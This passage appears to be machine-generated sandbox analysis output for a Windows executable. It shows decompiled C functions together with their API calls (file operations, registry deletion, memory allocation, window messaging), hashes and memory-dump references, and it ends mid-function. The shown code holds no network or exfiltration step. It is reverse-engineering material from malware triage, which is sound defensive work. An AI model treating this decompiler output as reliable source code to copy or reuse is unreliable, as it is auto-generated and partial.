                                                            • Instruction Fuzzy Hash: 20418F7240034DAFDB51EF298C44B9A3FFDFB41623F198129E94ADE181CB75A944CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401B87 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 59%
                                                            			E00401B87(void* __ebx, void* __edx) {
				intOrPtr _t7;
				void* _t8;
				void _t11;
				void* _t13;
				void* _t21;
				void* _t24;
				void* _t30;
				void* _t33;
				void* _t34;
				void* _t37;

				_t27 = __ebx;
				_t7 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x414478; // 0x0
				if(_t7 == __ebx) {
					if(__edx == __ebx) {
						_t8 = GlobalAlloc(0x40, 0x2004); // executed
						_t34 = _t8;
						_t4 = _t34 + 4; // 0x4
						E004062EA(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x28)));
						_t11 =  *0x414478; // 0x0
						 *_t34 = _t11;
						 *0x414478 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t2 = _t30 + 4; // 0x4
							E00406257(_t33, _t2);
							_push(_t30);
							 *0x414478 =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t7 = _t7 - 1;
						if(_t30 == _t27) {
							break;
						}
						_t30 =  *_t30;
						if(_t7 != _t27) {
							continue;
						} else {
							if(_t30 == _t27) {
								break;
							} else {
								_t32 = _t30 + 4;
								E00406257(0x40a438, _t30 + 4);
								_t21 =  *0x414478; // 0x0
								E00406257(_t32, _t21 + 4);
								_t24 =  *0x414478; // 0x0
								_push(0x40a438);
								_push(_t24 + 4);
								E00406257();
								L15:
								 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t37 - 4));
								_t13 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E004062EA(_t27, _t30, _t33, _t27, 0xffffffe8));
					E0040596D();
					_t13 = 0x7fffffff;
				}
				L17:
				return _t13;
			}













                                                            0x00401b87
                                                            0x00401b87
                                                            0x00401b8a
                                                            0x00401b92
                                                            0x00401bda
                                                            0x00401c08
                                                            0x00401c11
                                                            0x00401c13
                                                            0x00401c17
                                                            0x00401c1c
                                                            0x00401c21
                                                            0x00401c23
                                                            0x00401bdc
                                                            0x00401bde
                                                            0x004027c8
                                                            0x00401be4
                                                            0x00401be4
                                                            0x00401be9
                                                            0x00401bf0
                                                            0x00401bf1
                                                            0x00401bf6
                                                            0x00401bf6
                                                            0x00401bde
                                                            0x00000000
                                                            0x00401b94
                                                            0x00401b94
                                                            0x00401b94
                                                            0x00401b97
                                                            0x00000000
                                                            0x00000000
                                                            0x00401b9d
                                                            0x00401ba1
                                                            0x00000000
                                                            0x00401ba3
                                                            0x00401ba5
                                                            0x00000000
                                                            0x00401bab
                                                            0x00401bab
                                                            0x00401bb5
                                                            0x00401bba
                                                            0x00401bc4
                                                            0x00401bc9
                                                            0x00401bce
                                                            0x00401bd2
                                                            0x00402931
                                                            0x00402ac5
                                                            0x00402ac8
                                                            0x00402ace
                                                            0x00402ace
                                                            0x00401ba5
                                                            0x00000000
                                                            0x00401ba1
                                                            0x0040237c
                                                            0x00402389
                                                            0x0040238a
                                                            0x0040238f
                                                            0x0040238f
                                                            0x00402ad0
                                                            0x00402ad4

                                                            APIs
                                                            • GlobalFree.KERNEL32(00000000), ref: 00401BF6
                                                            • GlobalAlloc.KERNELBASE(00000040,00002004), ref: 00401C08
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFree
                                                            • String ID: Call
                                                            • API String ID: 3394109436-1824292864
                                                            • Opcode ID: ef51e244c9b72e316efee3d40e69dbbd1feb408e9613f1d734bb71ffb8df92b4
                                                            • Instruction ID: d2b80980e39293206c5e6d60a34a0b6bee3a2bd2daddf4a89311edae202359af
                                                            • Opcode Fuzzy Hash: ef51e244c9b72e316efee3d40e69dbbd1feb408e9613f1d734bb71ffb8df92b4
                                                            • Instruction Fuzzy Hash: 3E215E72600100A7E720FBA4DD89D9E73A59B89319B25443FF152F72D1D77CD8518B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004022F3 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004022F3() {
				char _t32;
				CHAR* _t35;
				CHAR* _t37;
				void* _t39;

				_t37 = E00402C39(_t32);
				_t35 = E00402C39(0x11);
				 *((intOrPtr*)(_t39 + 8)) = E00402C39(0x23);
				if(E004065CE(_t37) != 0) {
					 *(_t39 - 0x54) =  *(_t39 - 8);
					 *((intOrPtr*)(_t39 - 0x50)) = 2;
					( &(_t37[1]))[lstrlenA(_t37)] = _t32;
					( &(_t35[1]))[lstrlenA(_t35)] = _t32;
					_t25 =  *((intOrPtr*)(_t39 + 8));
					 *(_t39 - 0x4c) = _t37;
					 *(_t39 - 0x48) = _t35;
					 *((intOrPtr*)(_t39 - 0x3a)) =  *((intOrPtr*)(_t39 + 8));
					 *((short*)(_t39 - 0x44)) =  *((intOrPtr*)(_t39 - 0x20));
					E00405378(_t32, _t25);
					if(SHFileOperationA(_t39 - 0x54) != 0) {
						goto L1;
					}
				} else {
					L1:
					E00405378(0xfffffff9, _t32); // executed
					 *((intOrPtr*)(_t39 - 4)) = 1;
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t39 - 4));
				return 0;
			}







                                                            0x004022fb
                                                            0x00402304
                                                            0x0040230c
                                                            0x00402316
                                                            0x00402329
                                                            0x0040232c
                                                            0x00402339
                                                            0x00402342
                                                            0x00402346
                                                            0x0040234f
                                                            0x00402352
                                                            0x00402355
                                                            0x00402358
                                                            0x0040235c
                                                            0x0040236d
                                                            0x00000000
                                                            0x00402373
                                                            0x00402318
                                                            0x00402318
                                                            0x0040231b
                                                            0x004027c8
                                                            0x004027c8
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                              • Part of subcall function 004065CE: FindFirstFileA.KERNELBASE(00000020,004480E0,00446098,00405D1A,00446098,00446098,00000000,00446098,00446098,T'Wu,?,00485000,00405A39,?,75572754,00485000), ref: 004065D9
                                                              • Part of subcall function 004065CE: FindClose.KERNELBASE(00000000), ref: 004065E5
                                                            • lstrlenA.KERNEL32 ref: 00402333
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040233D
                                                            • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402365
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileFindlstrlen$CloseFirstOperation
                                                            • String ID:
                                                            • API String ID: 1486964399-0
                                                            • Opcode ID: 053537b90b94227762147015232e5ec5979310bb3674d4cdadc8849d194cb865
                                                            • Instruction ID: bdcadd7e5dff747a6480a3611f7c4249811e34a0dd3bad8b9c8728891d0ecdbb
                                                            • Opcode Fuzzy Hash: 053537b90b94227762147015232e5ec5979310bb3674d4cdadc8849d194cb865
                                                            • Instruction Fuzzy Hash: B1115E71D04308AADB10EFB58A4999EB6B8AF04314F20447FB401F72C1D6BCC5018B69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 59%
                                                            			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x452450;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x44e40c =  *0x44e40c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x44e40c, 0x7530,  *0x44e3f4), 0); // executed
					}
				}
				return 0;
			}











                                                            0x0040138a
                                                            0x004013fa
                                                            0x0040139b
                                                            0x004013a0
                                                            0x00000000
                                                            0x00000000
                                                            0x004013a2
                                                            0x004013a3
                                                            0x004013ad
                                                            0x00000000
                                                            0x00401404
                                                            0x004013b0
                                                            0x004013b7
                                                            0x004013bd
                                                            0x004013be
                                                            0x004013c0
                                                            0x004013c2
                                                            0x004013b9
                                                            0x004013b9
                                                            0x004013ba
                                                            0x004013ba
                                                            0x004013c9
                                                            0x004013cb
                                                            0x004013f4
                                                            0x004013f4
                                                            0x004013c9
                                                            0x00000000

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 8ffdd9807c9e9fea2b97bbb89bab772424fd2da09bf17e16083ab72da1b50c14
                                                            • Instruction ID: 797ac5eab5bd55ce3963157cabd24902f5215075ef1b0f0e1f2fe658c051a2dc
                                                            • Opcode Fuzzy Hash: 8ffdd9807c9e9fea2b97bbb89bab772424fd2da09bf17e16083ab72da1b50c14
                                                            • Instruction Fuzzy Hash: 0A01D1316242209BE7094B399D08B2A3798F711318F10823FB851F61F1D678CC129B4C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402429 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00402429(void* __ebx, void* __edx) {
				long _t6;
				void* _t13;
				long _t18;
				void* _t20;
				void* _t22;
				void* _t23;

				_t13 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				_t20 = __edx;
				if( *(_t23 - 0x18) != __ebx) {
					_t6 = E00402CF7(_t20, E00402C39(0x22),  *(_t23 - 0x18) >> 1); // executed
					_t18 = _t6;
					goto L4;
				} else {
					_t22 = E00402C79(_t26, 2);
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueA(_t22, E00402C39(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t13) {
							goto L6;
						}
					}
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}









                                                            0x00402429
                                                            0x00402429
                                                            0x0040242c
                                                            0x0040242e
                                                            0x0040246a
                                                            0x0040246f
                                                            0x00000000
                                                            0x00402430
                                                            0x00402437
                                                            0x0040243b
                                                            0x004027c8
                                                            0x004027c8
                                                            0x00402441
                                                            0x00402451
                                                            0x00402453
                                                            0x00402471
                                                            0x00402473
                                                            0x00000000
                                                            0x00402479
                                                            0x00402473
                                                            0x0040243b
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 0040244A
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402453
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseDeleteValue
                                                            • String ID:
                                                            • API String ID: 2831762973-0
                                                            • Opcode ID: 89043e2fe8687ce586435c5a551923b9262886b562137b10a05521ca1fbc2108
                                                            • Instruction ID: 34235f3b1f430fbf497285b3b61430caa7c9be3a8a673b0b08f99ec2f467b38a
                                                            • Opcode Fuzzy Hash: 89043e2fe8687ce586435c5a551923b9262886b562137b10a05521ca1fbc2108
                                                            • Instruction Fuzzy Hash: 4FF0F632A04120ABE710ABB49B8E9AE62A89B40314F25043FF202B31C1DAF84D41966E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040544A Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 50%
                                                            			E0040544A(signed int __eax) {
				intOrPtr _v0;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x452448;
				_t10 =  *0x45244c;
				__imp__OleInitialize(0); // executed
				 *0x4524e0 =  *0x4524e0 | __eax;
				E00404320(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					while(1) {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
							break;
						}
						_t12 = _t12 + 0x2018;
						if(_t10 != 0) {
							continue;
						} else {
						}
						goto L7;
					}
					 *0x4524ac =  *0x4524ac + 1;
				}
				L7:
				E00404320(0x404);
				__imp__OleUninitialize();
				return  *0x4524ac;
			}







                                                            0x0040544b
                                                            0x00405452
                                                            0x0040545a
                                                            0x00405460
                                                            0x00405468
                                                            0x0040546f
                                                            0x00405471
                                                            0x00405474
                                                            0x00405474
                                                            0x00405479
                                                            0x00000000
                                                            0x00000000
                                                            0x0040548a
                                                            0x00405492
                                                            0x00000000
                                                            0x00000000
                                                            0x00405494
                                                            0x00000000
                                                            0x00405492
                                                            0x00405496
                                                            0x00405496
                                                            0x0040549c
                                                            0x004054a1
                                                            0x004054a6
                                                            0x004054b3

                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 0040545A
                                                              • Part of subcall function 00404320: SendMessageA.USER32 ref: 00404332
                                                            • OleUninitialize.OLE32 ref: 004054A6
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: InitializeMessageSendUninitialize
                                                            • String ID:
                                                            • API String ID: 2896919175-0
                                                            • Opcode ID: 26a39bb3d1c59b8153bbe96717fa75530bfd0ef50f002ce5e2fc391db5d8019d
                                                            • Instruction ID: 605ee913eaad74fb131c45803b2287184ab1d6587fbed753920360c824042bb4
                                                            • Opcode Fuzzy Hash: 26a39bb3d1c59b8153bbe96717fa75530bfd0ef50f002ce5e2fc391db5d8019d
                                                            • Instruction Fuzzy Hash: 43F0F073500B00ABE6409704EE01BAA7360EB82317F09403BEE44722A2D7B588458A5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401A1E Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00401A1E(char __ebx) {
				CHAR* _t7;
				long _t8;
				char _t12;
				CHAR* _t17;
				void* _t19;

				_t12 = __ebx;
				_t7 = E00402C39(1);
				 *(_t19 + 8) = _t7;
				_t8 = ExpandEnvironmentStringsA(_t7, _t17, 0x2000); // executed
				if(_t8 == 0 ||  *((intOrPtr*)(_t19 - 0x20)) != __ebx && lstrcmpA( *(_t19 + 8), _t17) == 0) {
					 *((intOrPtr*)(_t19 - 4)) = 1;
					 *_t17 = _t12;
				}
				_t17[0x1fff] = _t12;
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}








                                                            0x00401a1e
                                                            0x00401a22
                                                            0x00401a2e
                                                            0x00401a31
                                                            0x00401a39
                                                            0x00401a4e
                                                            0x00401a51
                                                            0x00401a51
                                                            0x00401a53
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00002000,00000001), ref: 00401A31
                                                            • lstrcmpA.KERNEL32(?,?,?,00002000,00000001), ref: 00401A44
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStringslstrcmp
                                                            • String ID:
                                                            • API String ID: 1938659011-0
                                                            • Opcode ID: 4ff85bcb3c9e7bd11aa9790aa2296d6940b0516171ff6c32d0b182c22be1f72c
                                                            • Instruction ID: 0c80c25ae6124d08632ca9112a85281756203997caa87babcc69875add3a12a2
                                                            • Opcode Fuzzy Hash: 4ff85bcb3c9e7bd11aa9790aa2296d6940b0516171ff6c32d0b182c22be1f72c
                                                            • Instruction Fuzzy Hash: E1F08231705201EBDB20DF769D48A9FBFA5EF92350710843FE145F6191D7788501CA68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401EC5 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$EnableShow
                                                            • String ID:
                                                            • API String ID: 1136574915-0
                                                            • Opcode ID: f9bc8f064641d470ec4c16ff3f6f2a01e2106a779a3e6cb67e237468840b0f57
                                                            • Instruction ID: 95492d4cb058fd8d3dfd6bdd8f68eb7ce1d8cbcbb3bb97f8bbdf30dd964bc089
                                                            • Opcode Fuzzy Hash: f9bc8f064641d470ec4c16ff3f6f2a01e2106a779a3e6cb67e237468840b0f57
                                                            • Instruction Fuzzy Hash: 12E01272A08200AFD714EBA5AA8956EB7B4EB81365B20443FF101F11D1DBB858408A69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004058F0 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004058F0(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x448098->cb = 0x44;
